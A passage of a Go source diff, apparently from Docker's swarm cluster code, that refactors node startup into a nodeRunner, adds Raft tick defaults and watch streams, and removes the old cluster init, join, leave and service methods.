+	attachers    map[string]*attacher
+	watchStream  chan *swarmapi.WatchMessage
 }
 
 // attacher manages the in-memory attachment state of a container
@@ -121,43 +127,12 @@ type Cluster struct {
 type attacher struct {
 	taskID           string
 	config           *network.NetworkingConfig
+	inProgress       bool
 	attachWaitCh     chan *network.NetworkingConfig
 	attachCompleteCh chan struct{}
 	detachWaitCh     chan struct{}
 }
 
-type node struct {
-	*swarmnode.Node
-	done           chan struct{}
-	ready          bool
-	conn           *grpc.ClientConn
-	client         swarmapi.ControlClient
-	logs           swarmapi.LogsClient
-	reconnectDelay time.Duration
-	config         nodeStartConfig
-}
-
-// nodeStartConfig holds configuration needed to start a new node. Exported
-// fields of this structure are saved to disk in json. Unexported fields
-// contain data that shouldn't be persisted between daemon reloads.
-type nodeStartConfig struct {
-	// LocalAddr is this machine's local IP or hostname, if specified.
-	LocalAddr string
-	// RemoteAddr is the address that was given to "swarm join". It is used
-	// to find LocalAddr if necessary.
-	RemoteAddr string
-	// ListenAddr is the address we bind to, including a port.
-	ListenAddr string
-	// AdvertiseAddr is the address other nodes should connect to,
-	// including a port.
-	AdvertiseAddr   string
-	joinAddr        string
-	forceNewCluster bool
-	joinToken       string
-	lockKey         []byte
-	autolock        bool
-}
-
 // New creates a new Cluster instance using provided config.
 func New(config Config) (*Cluster, error) {
 	root := filepath.Join(config.Root, swarmDirName)
@@ -167,114 +142,61 @@ func New(config Config) (*Cluster, error) {
 	if config.RuntimeRoot == "" {
 		config.RuntimeRoot = root
 	}
+	if config.RaftHeartbeatTick == 0 {
+		config.RaftHeartbeatTick = 1
+	}
+	if config.RaftElectionTick == 0 {
+		// 10X heartbeat tick is the recommended ratio according to etcd docs.
+		config.RaftElectionTick = 10 * config.RaftHeartbeatTick
+	}
+
 	if err := os.MkdirAll(config.RuntimeRoot, 0700); err != nil {
 		return nil, err
 	}
 	c := &Cluster{
 		root:        root,
 		config:      config,
-		configEvent: make(chan struct{}, 10),
+		configEvent: make(chan lncluster.ConfigEventType, 10),
 		runtimeRoot: config.RuntimeRoot,
 		attachers:   make(map[string]*attacher),
+		watchStream: config.WatchStream,
 	}
-
-	nodeConfig, err := c.loadState()
-	if err != nil {
-		if os.IsNotExist(err) {
-			return c, nil
-		}
-		return nil, err
-	}
-
-	n, err := c.startNewNode(*nodeConfig)
-	if err != nil {
-		return nil, err
-	}
-
-	select {
-	case <-time.After(swarmConnectTimeout):
-		logrus.Error("swarm component could not be started before timeout was reached")
-	case <-n.Ready():
-	case <-n.done:
-		if errors.Cause(c.err) == ErrSwarmLocked {
-			return c, nil
-		}
-		if err, ok := errors.Cause(c.err).(x509.CertificateInvalidError); ok && err.Reason == x509.Expired {
-			c.err = ErrSwarmCertificatesExpired
-			return c, nil
-		}
-		return nil, fmt.Errorf("swarm component could not be started: %v", c.err)
-	}
-	go c.reconnectOnFailure(n)
 	return c, nil
 }
 
-func (c *Cluster) loadState() (*nodeStartConfig, error) {
-	dt, err := ioutil.ReadFile(filepath.Join(c.root, stateFile))
+// Start the Cluster instance
+// TODO The split between New and Start can be join again when the SendClusterEvent
+// method is no longer required
+func (c *Cluster) Start() error {
+	root := filepath.Join(c.config.Root, swarmDirName)
+
+	nodeConfig, err := loadPersistentState(root)
 	if err != nil {
-		return nil, err
-	}
-	// missing certificate means no actual state to restore from
-	if _, err := os.Stat(filepath.Join(c.root, "certificates/swarm-node.crt")); err != nil {
 		if os.IsNotExist(err) {
-			c.clearState()
+			return nil
 		}
-		return nil, err
-	}
-	var st nodeStartConfig
-	if err := json.Unmarshal(dt, &st); err != nil {
-		return nil, err
+		return err
 	}
-	return &st, nil
-}
 
-func (c *Cluster) saveState(config nodeStartConfig) error {
-	dt, err := json.Marshal(config)
+	nr, err := c.newNodeRunner(*nodeConfig)
 	if err != nil {
 		return err
 	}
-	return ioutils.AtomicWriteFile(filepath.Join(c.root, stateFile), dt, 0600)
-}
+	c.nr = nr
 
-func (c *Cluster) reconnectOnFailure(n *node) {
-	for {
-		<-n.done
-		c.Lock()
-		if c.stop || c.node != nil {
-			c.Unlock()
-			return
-		}
-		n.reconnectDelay *= 2
-		if n.reconnectDelay > maxReconnectDelay {
-			n.reconnectDelay = maxReconnectDelay
-		}
-		logrus.Warnf("Restarting swarm in %.2f seconds", n.reconnectDelay.Seconds())
-		delayCtx, cancel := context.WithTimeout(context.Background(), n.reconnectDelay)
-		c.cancelDelay = cancel
-		c.Unlock()
-		<-delayCtx.Done()
-		if delayCtx.Err() != context.DeadlineExceeded {
-			return
-		}
-		c.Lock()
-		if c.node != nil {
-			c.Unlock()
-			return
-		}
-		var err error
-		config := n.config
-		config.RemoteAddr = c.getRemoteAddress()
-		config.joinAddr = config.RemoteAddr
-		n, err = c.startNewNode(config)
+	select {
+	case <-time.After(swarmConnectTimeout):
+		logrus.Error("swarm component could not be started before timeout was reached")
+	case err := <-nr.Ready():
 		if err != nil {
-			c.err = err
-			close(n.done)
+			logrus.WithError(err).Error("swarm component could not be started")
+			return nil
 		}
-		c.Unlock()
 	}
+	return nil
 }
 
-func (c *Cluster) startNewNode(conf nodeStartConfig) (*node, error) {
+func (c *Cluster) newNodeRunner(conf nodeStartConfig) (*nodeRunner, error) {
 	if err := c.config.Backend.IsSwarmCompatible(); err != nil {
 		return nil, err
 	}
@@ -308,1551 +230,174 @@ func (c *Cluster) startNewNode(conf nodeStartConfig) (*node, error) {
 		}
 	}
 
-	var control string
-	if runtime.GOOS == "windows" {
-		control = `\\.\pipe\` + controlSocket
-	} else {
-		control = filepath.Join(c.runtimeRoot, controlSocket)
-	}
-
-	c.node = nil
-	c.cancelDelay = nil
-	c.stop = false
-	n, err := swarmnode.New(&swarmnode.Config{
-		Hostname:           c.config.Name,
-		ForceNewCluster:    conf.forceNewCluster,
-		ListenControlAPI:   control,
-		ListenRemoteAPI:    conf.ListenAddr,
-		AdvertiseRemoteAPI: conf.AdvertiseAddr,
-		JoinAddr:           conf.joinAddr,
-		StateDir:           c.root,
-		JoinToken:          conf.joinToken,
-		Executor:           container.NewExecutor(c.config.Backend),
-		HeartbeatTick:      1,
-		ElectionTick:       3,
-		UnlockKey:          conf.lockKey,
-		AutoLockManagers:   conf.autolock,
-		PluginGetter:       c.config.Backend.PluginGetter(),
-	})
+	nr := &nodeRunner{cluster: c}
+	nr.actualLocalAddr = actualLocalAddr
 
-	if err != nil {
-		return nil, err
-	}
-	ctx := context.Background()
-	if err := n.Start(ctx); err != nil {
+	if err := nr.Start(conf); err != nil {
 		return nil, err
 	}
-	node := &node{
-		Node:           n,
-		done:           make(chan struct{}),
-		reconnectDelay: initialReconnectDelay,
-		config:         conf,
-	}
-	c.node = node
-	c.actualLocalAddr = actualLocalAddr // not saved
-	c.saveState(conf)
 
 	c.config.Backend.DaemonJoinsCluster(c)
-	go func() {
-		err := detectLockedError(n.Err(ctx))
-		if err != nil {
-			logrus.Errorf("cluster exited with error: %v", err)
-		}
-		c.Lock()
-		c.node = nil
-		c.err = err
-		if errors.Cause(err) == ErrSwarmLocked {
-			c.locked = true
-			confClone := conf
-			c.lastNodeConfig = &confClone
-		}
-		c.Unlock()
-		close(node.done)
-	}()
-
-	go func() {
-		select {
-		case <-n.Ready():
-			c.Lock()
-			node.ready = true
-			c.err = nil
-			c.Unlock()
-		case <-ctx.Done():
-		}
-		c.configEvent <- struct{}{}
-	}()
-
-	go func() {
-		for conn := range n.ListenControlSocket(ctx) {
-			c.Lock()
-			if node.conn != conn {
-				if conn == nil {
-					node.client = nil
-					node.logs = nil
-				} else {
-					node.client = swarmapi.NewControlClient(conn)
-					node.logs = swarmapi.NewLogsClient(conn)
-				}
-			}
-			node.conn = conn
-			c.Unlock()
-			c.configEvent <- struct{}{}
-		}
-	}()
-
-	return node, nil
-}
-
-// Init initializes new cluster from user provided request.
-func (c *Cluster) Init(req types.InitRequest) (string, error) {
-	c.Lock()
-	if c.swarmExists() {
-		if !req.ForceNewCluster {
-			c.Unlock()
-			return "", ErrSwarmExists
-		}
-		if err := c.stopNode(); err != nil {
-			c.Unlock()
-			return "", err
-		}
-	}
-
-	if err := validateAndSanitizeInitRequest(&req); err != nil {
-		c.Unlock()
-		return "", err
-	}
-
-	listenHost, listenPort, err := resolveListenAddr(req.ListenAddr)
-	if err != nil {
-		c.Unlock()
-		return "", err
-	}
-
-	advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort)
-	if err != nil {
-		c.Unlock()
-		return "", err
-	}
-
-	localAddr := listenHost
-
-	// If the local address is undetermined, the advertise address
-	// will be used as local address, if it belongs to this system.
-	// If the advertise address is not local, then we try to find
-	// a system address to use as local address. If this fails,
-	// we give up and ask user to pass the listen address.
-	if net.ParseIP(localAddr).IsUnspecified() {
-		advertiseIP := net.ParseIP(advertiseHost)
-
-		found := false
-		for _, systemIP := range listSystemIPs() {
-			if systemIP.Equal(advertiseIP) {
-				localAddr = advertiseIP.String()
-				found = true
-				break
-			}
-		}
-
-		if !found {
-			ip, err := c.resolveSystemAddr()
-			if err != nil {
-				c.Unlock()
-				logrus.Warnf("Could not find a local address: %v", err)
-				return "", errMustSpecifyListenAddr
-			}
-			localAddr = ip.String()
-		}
-	}
-
-	// todo: check current state existing
-	n, err := c.startNewNode(nodeStartConfig{
-		forceNewCluster: req.ForceNewCluster,
-		autolock:        req.AutoLockManagers,
-		LocalAddr:       localAddr,
-		ListenAddr:      net.JoinHostPort(listenHost, listenPort),
-		AdvertiseAddr:   net.JoinHostPort(advertiseHost, advertisePort),
-	})
-	if err != nil {
-		c.Unlock()
-		return "", err
-	}
-	c.Unlock()
-
-	select {
-	case <-n.Ready():
-		if err := initClusterSpec(n, req.Spec); err != nil {
-			return "", err
-		}
-		go c.reconnectOnFailure(n)
-		return n.NodeID(), nil
-	case <-n.done:
-		c.RLock()
-		defer c.RUnlock()
-		if !req.ForceNewCluster { // if failure on first attempt don't keep state
-			if err := c.clearState(); err != nil {
-				return "", err
-			}
-		}
-		return "", c.err
-	}
-}
-
-// Join makes current Cluster part of an existing swarm cluster.
-func (c *Cluster) Join(req types.JoinRequest) error {
-	c.Lock()
-	if c.swarmExists() {
-		c.Unlock()
-		return ErrSwarmExists
-	}
-	if err := validateAndSanitizeJoinRequest(&req); err != nil {
-		c.Unlock()
-		return err
-	}
-
-	listenHost, listenPort, err := resolveListenAddr(req.ListenAddr)
-	if err != nil {
-		c.Unlock()
-		return err
-	}
-
-	var advertiseAddr string
-	if req.AdvertiseAddr != "" {
-		advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort)
-		// For joining, we don't need to provide an advertise address,
-		// since the remote side can detect it.
-		if err == nil {
-			advertiseAddr = net.JoinHostPort(advertiseHost, advertisePort)
-		}
-	}
-
-	// todo: check current state existing
-	n, err := c.startNewNode(nodeStartConfig{
-		RemoteAddr:    req.RemoteAddrs[0],
-		ListenAddr:    net.JoinHostPort(listenHost, listenPort),
-		AdvertiseAddr: advertiseAddr,
-		joinAddr:      req.RemoteAddrs[0],
-		joinToken:     req.JoinToken,
-	})
-	if err != nil {
-		c.Unlock()
-		return err
-	}
-	c.Unlock()
-
-	select {
-	case <-time.After(swarmConnectTimeout):
-		// attempt to connect will continue in background, but reconnect only if it didn't fail
-		go func() {
-			select {
-			case <-n.Ready():
-				c.reconnectOnFailure(n)
-			case <-n.done:
-				logrus.Errorf("failed to join the cluster: %+v", c.err)
-			}
-		}()
-		return ErrSwarmJoinTimeoutReached
-	case <-n.Ready():
-		go c.reconnectOnFailure(n)
-		return nil
-	case <-n.done:
-		c.RLock()
-		defer c.RUnlock()
-		return c.err
-	}
-}
-
-// GetUnlockKey returns the unlock key for the swarm.
-func (c *Cluster) GetUnlockKey() (string, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return "", c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	client := swarmapi.NewCAClient(c.conn)
-
-	r, err := client.GetUnlockKey(ctx, &swarmapi.GetUnlockKeyRequest{})
-	if err != nil {
-		return "", err
-	}
-
-	if len(r.UnlockKey) == 0 {
-		// no key
-		return "", nil
-	}
-
-	return encryption.HumanReadableKey(r.UnlockKey), nil
-}
-
-// UnlockSwarm provides a key to decrypt data that is encrypted at rest.
-func (c *Cluster) UnlockSwarm(req types.UnlockRequest) error {
-	c.RLock()
-	if !c.isActiveManager() {
-		if err := c.errNoManager(); err != ErrSwarmLocked {
-			c.RUnlock()
-			return err
-		}
-	}
-
-	if c.node != nil || c.locked != true {
-		c.RUnlock()
-		return errors.New("swarm is not locked")
-	}
-	c.RUnlock()
-
-	key, err := encryption.ParseHumanReadableKey(req.UnlockKey)
-	if err != nil {
-		return err
-	}
-
-	c.Lock()
-	config := *c.lastNodeConfig
-	config.lockKey = key
-	n, err := c.startNewNode(config)
-	if err != nil {
-		c.Unlock()
-		return err
-	}
-	c.Unlock()
-	select {
-	case <-n.Ready():
-	case <-n.done:
-		if errors.Cause(c.err) == ErrSwarmLocked {
-			return errors.New("swarm could not be unlocked: invalid key provided")
-		}
-		return fmt.Errorf("swarm component could not be started: %v", c.err)
-	}
-	go c.reconnectOnFailure(n)
-	return nil
-}
-
-// stopNode is a helper that stops the active c.node and waits until it has
-// shut down. Call while keeping the cluster lock.
-func (c *Cluster) stopNode() error {
-	if c.node == nil {
-		return nil
-	}
-	c.stop = true
-	if c.cancelDelay != nil {
-		c.cancelDelay()
-		c.cancelDelay = nil
-	}
-	node := c.node
-	ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
-	defer cancel()
-	// TODO: can't hold lock on stop because it calls back to network
-	c.Unlock()
-	defer c.Lock()
-	if err := node.Stop(ctx); err != nil && !strings.Contains(err.Error(), "context canceled") {
-		return err
-	}
-	<-node.done
-	return nil
-}
-
-func removingManagerCausesLossOfQuorum(reachable, unreachable int) bool {
-	return reachable-2 <= unreachable
-}
-
-func isLastManager(reachable, unreachable int) bool {
-	return reachable == 1 && unreachable == 0
-}
-
-// Leave shuts down Cluster and removes current state.
-func (c *Cluster) Leave(force bool) error {
-	c.Lock()
-	node := c.node
-	if node == nil {
-		if c.locked {
-			c.locked = false
-			c.lastNodeConfig = nil
-			c.Unlock()
-		} else if c.err == ErrSwarmCertificatesExpired {
-			c.err = nil
-			c.Unlock()
-		} else {
-			c.Unlock()
-			return ErrNoSwarm
-		}
-	} else {
-		if node.Manager() != nil && !force {
-			msg := "You are attempting to leave the swarm on a node that is participating as a manager. "
-			if c.isActiveManager() {
-				active, reachable, unreachable, err := c.managerStats()
-				if err == nil {
-					if active && removingManagerCausesLossOfQuorum(reachable, unreachable) {
-						if isLastManager(reachable, unreachable) {
-							msg += "Removing the last manager erases all current state of the swarm. Use `--force` to ignore this message. "
-							c.Unlock()
-							return fmt.Errorf(msg)
-						}
-						msg += fmt.Sprintf("Removing this node leaves %v managers out of %v. Without a Raft quorum your swarm will be inaccessible. ", reachable-1, reachable+unreachable)
-					}
-				}
-			} else {
-				msg += "Doing so may lose the consensus of your cluster. "
-			}
-
-			msg += "The only way to restore a swarm that has lost consensus is to reinitialize it with `--force-new-cluster`. Use `--force` to suppress this message."
-			c.Unlock()
-			return fmt.Errorf(msg)
-		}
-		if err := c.stopNode(); err != nil {
-			logrus.Errorf("failed to shut down cluster node: %v", err)
-			signal.DumpStacks("")
-			c.Unlock()
-			return err
-		}
-		c.Unlock()
-		if nodeID := node.NodeID(); nodeID != "" {
-			nodeContainers, err := c.listContainerForNode(nodeID)
-			if err != nil {
-				return err
-			}
-			for _, id := range nodeContainers {
-				if err := c.config.Backend.ContainerRm(id, &apitypes.ContainerRmConfig{ForceRemove: true}); err != nil {
-					logrus.Errorf("error removing %v: %v", id, err)
-				}
-			}
-		}
-	}
-	c.configEvent <- struct{}{}
-	// todo: cleanup optional?
-	if err := c.clearState(); err != nil {
-		return err
-	}
-
-	return nil
-}
-
-func (c *Cluster) listContainerForNode(nodeID string) ([]string, error) {
-	var ids []string
-	filters := filters.NewArgs()
-	filters.Add("label", fmt.Sprintf("com.docker.swarm.node.id=%s", nodeID))
-	containers, err := c.config.Backend.Containers(&apitypes.ContainerListOptions{
-		Filters: filters,
-	})
-	if err != nil {
-		return []string{}, err
-	}
-	for _, c := range containers {
-		ids = append(ids, c.ID)
-	}
-	return ids, nil
-}
 
-func (c *Cluster) clearState() error {
-	// todo: backup this data instead of removing?
-	if err := os.RemoveAll(c.root); err != nil {
-		return err
-	}
-	if err := os.MkdirAll(c.root, 0700); err != nil {
-		return err
-	}
-	c.config.Backend.DaemonLeavesCluster()
-	return nil
+	return nr, nil
 }
 
 func (c *Cluster) getRequestContext() (context.Context, func()) { // TODO: not needed when requests don't block on qourum lost
 	return context.WithTimeout(context.Background(), swarmRequestTimeout)
 }
 
-// Inspect retrieves the configuration properties of a managed swarm cluster.
-func (c *Cluster) Inspect() (types.Swarm, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return types.Swarm{}, c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	swarm, err := getSwarm(ctx, c.client)
-	if err != nil {
-		return types.Swarm{}, err
-	}
-
-	return convert.SwarmFromGRPC(*swarm), nil
-}
-
-// Update updates configuration of a managed swarm cluster.
-func (c *Cluster) Update(version uint64, spec types.Spec, flags types.UpdateFlags) error {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	swarm, err := getSwarm(ctx, c.client)
-	if err != nil {
-		return err
-	}
-
-	// In update, client should provide the complete spec of the swarm, including
-	// Name and Labels. If a field is specified with 0 or nil, then the default value
-	// will be used to swarmkit.
-	clusterSpec, err := convert.SwarmSpecToGRPC(spec)
-	if err != nil {
-		return err
-	}
-
-	_, err = c.client.UpdateCluster(
-		ctx,
-		&swarmapi.UpdateClusterRequest{
-			ClusterID: swarm.ID,
-			Spec:      &clusterSpec,
-			ClusterVersion: &swarmapi.Version{
-				Index: version,
-			},
-			Rotation: swarmapi.KeyRotation{
-				WorkerJoinToken:  flags.RotateWorkerToken,
-				ManagerJoinToken: flags.RotateManagerToken,
-				ManagerUnlockKey: flags.RotateManagerUnlockKey,
-			},
-		},
-	)
-	return err
-}
-
 // IsManager returns true if Cluster is participating as a manager.
 func (c *Cluster) IsManager() bool {
-	c.RLock()
-	defer c.RUnlock()
-	return c.isActiveManager()
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+	return c.currentNodeState().IsActiveManager()
 }
 
 // IsAgent returns true if Cluster is participating as a worker/agent.
 func (c *Cluster) IsAgent() bool {
-	c.RLock()
-	defer c.RUnlock()
-	return c.node != nil && c.ready
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+	return c.currentNodeState().status == types.LocalNodeStateActive
 }
 
 // GetLocalAddress returns the local address.
 func (c *Cluster) GetLocalAddress() string {
-	c.RLock()
-	defer c.RUnlock()
-	return c.actualLocalAddr
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+	return c.currentNodeState().actualLocalAddr
 }
 
 // GetListenAddress returns the listen address.
 func (c *Cluster) GetListenAddress() string {
-	c.RLock()
-	defer c.RUnlock()
-	if c.node != nil {
-		return c.node.config.ListenAddr
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+	if c.nr != nil {
+		return c.nr.config.ListenAddr
 	}
 	return ""
 }
 
 // GetAdvertiseAddress returns the remotely reachable address of this node.
 func (c *Cluster) GetAdvertiseAddress() string {
-	c.RLock()
-	defer c.RUnlock()
-	if c.node != nil && c.node.config.AdvertiseAddr != "" {
-		advertiseHost, _, _ := net.SplitHostPort(c.node.config.AdvertiseAddr)
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+	if c.nr != nil && c.nr.config.AdvertiseAddr != "" {
+		advertiseHost, _, _ := net.SplitHostPort(c.nr.config.AdvertiseAddr)
 		return advertiseHost
 	}
-	return c.actualLocalAddr
+	return c.currentNodeState().actualLocalAddr
+}
+
+// GetDataPathAddress returns the address to be used for the data path traffic, if specified.
+func (c *Cluster) GetDataPathAddress() string {
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+	if c.nr != nil {
+		return c.nr.config.DataPathAddr
+	}
+	return ""
 }
 
-// GetRemoteAddress returns a known advertise address of a remote manager if
+// GetRemoteAddressList returns the advertise address for each of the remote managers if
 // available.
-// todo: change to array/connect with info
-func (c *Cluster) GetRemoteAddress() string {
-	c.RLock()
-	defer c.RUnlock()
-	return c.getRemoteAddress()
+func (c *Cluster) GetRemoteAddressList() []string {
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+	return c.getRemoteAddressList()
+}
+
+// GetWatchStream returns the channel to pass changes from store watch API
+func (c *Cluster) GetWatchStream() chan *swarmapi.WatchMessage {
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+	return c.watchStream
 }
 
-func (c *Cluster) getRemoteAddress() string {
-	if c.node == nil {
-		return ""
+func (c *Cluster) getRemoteAddressList() []string {
+	state := c.currentNodeState()
+	if state.swarmNode == nil {
+		return []string{}
 	}
-	nodeID := c.node.NodeID()
-	for _, r := range c.node.Remotes() {
+
+	nodeID := state.swarmNode.NodeID()
+	remotes := state.swarmNode.Remotes()
+	addressList := make([]string, 0, len(remotes))
+	for _, r := range remotes {
 		if r.NodeID != nodeID {
-			return r.Addr
+			addressList = append(addressList, r.Addr)
 		}
 	}
-	return ""
+	return addressList
 }
 
 // ListenClusterEvents returns a channel that receives messages on cluster
 // participation changes.
 // todo: make cancelable and accessible to multiple callers
-func (c *Cluster) ListenClusterEvents() <-chan struct{} {
+func (c *Cluster) ListenClusterEvents() <-chan lncluster.ConfigEventType {
 	return c.configEvent
 }
 
-// Info returns information about the current cluster state.
-func (c *Cluster) Info() types.Info {
-	info := types.Info{
-		NodeAddr: c.GetAdvertiseAddress(),
-	}
-
-	c.RLock()
-	defer c.RUnlock()
+// currentNodeState should not be called without a read lock
+func (c *Cluster) currentNodeState() nodeState {
+	return c.nr.State()
+}
 
-	if c.node == nil {
-		info.LocalNodeState = types.LocalNodeStateInactive
-		if c.cancelDelay != nil {
-			info.LocalNodeState = types.LocalNodeStateError
-		}
-		if c.locked {
-			info.LocalNodeState = types.LocalNodeStateLocked
-		} else if c.err == ErrSwarmCertificatesExpired {
-			info.LocalNodeState = types.LocalNodeStateError
+// errNoManager returns error describing why manager commands can't be used.
+// Call with read lock.
+func (c *Cluster) errNoManager(st nodeState) error {
+	if st.swarmNode == nil {
+		if errors.Cause(st.err) == errSwarmLocked {
+			return errSwarmLocked
 		}
-	} else {
-		info.LocalNodeState = types.LocalNodeStatePending
-		if c.ready == true {
-			info.LocalNodeState = types.LocalNodeStateActive
-		} else if c.locked {
-			info.LocalNodeState = types.LocalNodeStateLocked
+		if st.err == errSwarmCertificatesExpired {
+			return errSwarmCertificatesExpired
 		}
+		return errors.WithStack(notAvailableError("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again."))
 	}
-	if c.err != nil {
-		info.Error = c.err.Error()
+	if st.swarmNode.Manager() != nil {
+		return errors.WithStack(notAvailableError("This node is not a swarm manager. Manager is being prepared or has trouble connecting to the cluster."))
 	}
+	return errors.WithStack(notAvailableError("This node is not a swarm manager. Worker nodes can't be used to view or modify cluster state. Please run this command on a manager node or promote the current node to a manager."))
+}
 
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	if c.isActiveManager() {
-		info.ControlAvailable = true
-		swarm, err := c.Inspect()
-		if err != nil {
-			info.Error = err.Error()
-		}
+// Cleanup stops active swarm node. This is run before daemon shutdown.
+func (c *Cluster) Cleanup() {
+	c.controlMutex.Lock()
+	defer c.controlMutex.Unlock()
 
-		// Strip JoinTokens
-		info.Cluster = swarm.ClusterInfo
+	c.mu.Lock()
+	node := c.nr
+	if node == nil {
+		c.mu.Unlock()
+		return
+	}
+	state := c.currentNodeState()
+	c.mu.Unlock()
 
-		if r, err := c.client.ListNodes(ctx, &swarmapi.ListNodesRequest{}); err == nil {
-			info.Nodes = len(r.Nodes)
-			for _, n := range r.Nodes {
-				if n.ManagerStatus != nil {
-					info.Managers = info.Managers + 1
-				}
+	if state.IsActiveManager() {
+		active, reachable, unreachable, err := managerStats(state.controlClient, state.NodeID())
+		if err == nil {
+			singlenode := active && isLastManager(reachable, unreachable)
+			if active && !singlenode && removingManagerCausesLossOfQuorum(reachable, unreachable) {
+				logrus.Errorf("Leaving cluster with %v managers left out of %v. Raft quorum will be lost.", reachable-1, reachable+unreachable)
 			}
 		}
 	}
 
-	if c.node != nil {
-		for _, r := range c.node.Remotes() {
-			info.RemoteManagers = append(info.RemoteManagers, types.Peer{NodeID: r.NodeID, Addr: r.Addr})
-		}
-		info.NodeID = c.node.NodeID()
+	if err := node.Stop(); err != nil {
+		logrus.Errorf("failed to shut down cluster node: %v", err)
+		signal.DumpStacks("")
 	}
 
-	return info
+	c.mu.Lock()
+	c.nr = nil
+	c.mu.Unlock()
 }
 
-// isActiveManager should not be called without a read lock
-func (c *Cluster) isActiveManager() bool {
-	return c.node != nil && c.conn != nil
-}
-
-// swarmExists should not be called without a read lock
-func (c *Cluster) swarmExists() bool {
-	return c.node != nil || c.locked || c.err == ErrSwarmCertificatesExpired
-}
-
-// errNoManager returns error describing why manager commands can't be used.
-// Call with read lock.
-func (c *Cluster) errNoManager() error {
-	if c.node == nil {
-		if c.locked {
-			return ErrSwarmLocked
-		}
-		if c.err == ErrSwarmCertificatesExpired {
-			return ErrSwarmCertificatesExpired
-		}
-		return fmt.Errorf("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.")
-	}
-	if c.node.Manager() != nil {
-		return fmt.Errorf("This node is not a swarm manager. Manager is being prepared or has trouble connecting to the cluster.")
-	}
-	return fmt.Errorf("This node is not a swarm manager. Worker nodes can't be used to view or modify cluster state. Please run this command on a manager node or promote the current node to a manager.")
-}
-
-// GetServices returns all services of a managed swarm cluster.
-func (c *Cluster) GetServices(options apitypes.ServiceListOptions) ([]types.Service, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return nil, c.errNoManager()
-	}
-
-	filters, err := newListServicesFilters(options.Filters)
-	if err != nil {
-		return nil, err
-	}
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	r, err := c.client.ListServices(
-		ctx,
-		&swarmapi.ListServicesRequest{Filters: filters})
-	if err != nil {
-		return nil, err
-	}
-
-	services := []types.Service{}
-
-	for _, service := range r.Services {
-		services = append(services, convert.ServiceFromGRPC(*service))
-	}
-
-	return services, nil
-}
-
-// imageWithDigestString takes an image such as name or name:tag
-// and returns the image pinned to a digest, such as name@sha256:34234...
-// Due to the difference between the docker/docker/reference, and the
-// docker/distribution/reference packages, we're parsing the image twice.
-// As the two packages converge, this function should be simplified.
-// TODO(nishanttotla): After the packages converge, the function must
-// convert distreference.Named -> distreference.Canonical, and the logic simplified.
-func (c *Cluster) imageWithDigestString(ctx context.Context, image string, authConfig *apitypes.AuthConfig) (string, error) {
-	if _, err := digest.ParseDigest(image); err == nil {
-		return "", errors.New("image reference is an image ID")
-	}
-	ref, err := distreference.ParseNamed(image)
-	if err != nil {
-		return "", err
-	}
-	// only query registry if not a canonical reference (i.e. with digest)
-	if _, ok := ref.(distreference.Canonical); !ok {
-		// create a docker/docker/reference Named object because GetRepository needs it
-		dockerRef, err := reference.ParseNamed(image)
-		if err != nil {
-			return "", err
-		}
-		dockerRef = reference.WithDefaultTag(dockerRef)
-		namedTaggedRef, ok := dockerRef.(reference.NamedTagged)
-		if !ok {
-			return "", fmt.Errorf("unable to cast image to NamedTagged reference object")
-		}
-
-		repo, _, err := c.config.Backend.GetRepository(ctx, namedTaggedRef, authConfig)
-		if err != nil {
-			return "", err
-		}
-		dscrptr, err := repo.Tags(ctx).Get(ctx, namedTaggedRef.Tag())
-		if err != nil {
-			return "", err
-		}
-
-		namedDigestedRef, err := distreference.WithDigest(distreference.EnsureTagged(ref), dscrptr.Digest)
-		if err != nil {
-			return "", err
-		}
-		return namedDigestedRef.String(), nil
-	}
-	// reference already contains a digest, so just return it
-	return ref.String(), nil
-}
-
-// CreateService creates a new service in a managed swarm cluster.
-func (c *Cluster) CreateService(s types.ServiceSpec, encodedAuth string) (*apitypes.ServiceCreateResponse, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return nil, c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	err := c.populateNetworkID(ctx, c.client, &s)
-	if err != nil {
-		return nil, err
-	}
-
-	serviceSpec, err := convert.ServiceSpecToGRPC(s)
-	if err != nil {
-		return nil, err
-	}
-
-	ctnr := serviceSpec.Task.GetContainer()
-	if ctnr == nil {
-		return nil, fmt.Errorf("service does not use container tasks")
-	}
-
-	if encodedAuth != "" {
-		ctnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth}
-	}
-
-	// retrieve auth config from encoded auth
-	authConfig := &apitypes.AuthConfig{}
-	if encodedAuth != "" {
-		if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil {
-			logrus.Warnf("invalid authconfig: %v", err)
-		}
-	}
-
-	resp := &apitypes.ServiceCreateResponse{}
-
-	// pin image by digest
-	if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" {
-		digestImage, err := c.imageWithDigestString(ctx, ctnr.Image, authConfig)
-		if err != nil {
-			logrus.Warnf("unable to pin image %s to digest: %s", ctnr.Image, err.Error())
